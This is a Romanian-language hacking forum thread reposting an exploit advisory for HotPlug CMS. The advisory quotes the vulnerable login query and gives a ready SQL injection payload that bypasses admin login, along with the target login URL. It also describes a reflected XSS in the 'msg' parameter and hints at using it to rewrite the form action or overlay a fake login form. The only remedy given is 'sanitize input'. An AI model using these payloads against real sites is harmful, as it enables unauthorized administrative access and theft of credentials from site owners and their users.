Jump to content
Guest

HotPlug CMS -latest version

Recommended Posts

Posted

Cei mai Kw3rLN credeai ca numai tu iubesti cms-urile ? :P



---------------------------------------------------------------------------

Package: HotPlug CMS

version : latest version

---------------------------------------------------------------------------

Package Author: Sebastien Rousseau <seb@phoenixfx.com>

Home Page [url]http://www.hotplugcms.com/[/url]

---------------------------------------------------------------------------



Discovered By Sysghost [ Romanian Security Team ]



1.ADMIN Bypass SQL injection



code: query="select * from $this->tablename where email='$u' and password='$w'";

exploit: user=1' or 1 LIMIT 0, 1/*     password=pass

url : [url]http://[site]/administration/tblcontent/login1.php[/url]

Only tested on my localhost using MySQL

---------------------------------------------------------------------------



2.XSS



url: [url]http://[site]/administration/tblcontent/login1.php?msg=[/url][XSS CODE]

Hints to XSS attack:

a.a script inject use the void command to modify the action field in the form.

b.use css to create a new form on top of the that one using the position attributes.





Solution :

~~~~~~~~~~



SANITIZE INPUT

---------------------------------------------------------------------------



Shoutz:

~~~~~~



# Greetz to Kw3rLN, str0ke and the members of Romanian Security Team [ [url]hTTp://Romania.HackTECK.BE[/url] ]

---------------------------------------------------------------------------



*/

I can be found here [url]hTTp://Romania.HackTECK.BE[/url]

P.S. hotplug.com e ff vulnerabil da mie lene ca folosesc postgresu....

Posted

a smf tocmai eu mam uitat numai pe milw0rm inainte ... si nu erau exploituri... deabia dupa mi-o venit sa ma uit pe google o mai gasit cineva xss ..... :@ :@ :@ ma impusc ....

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...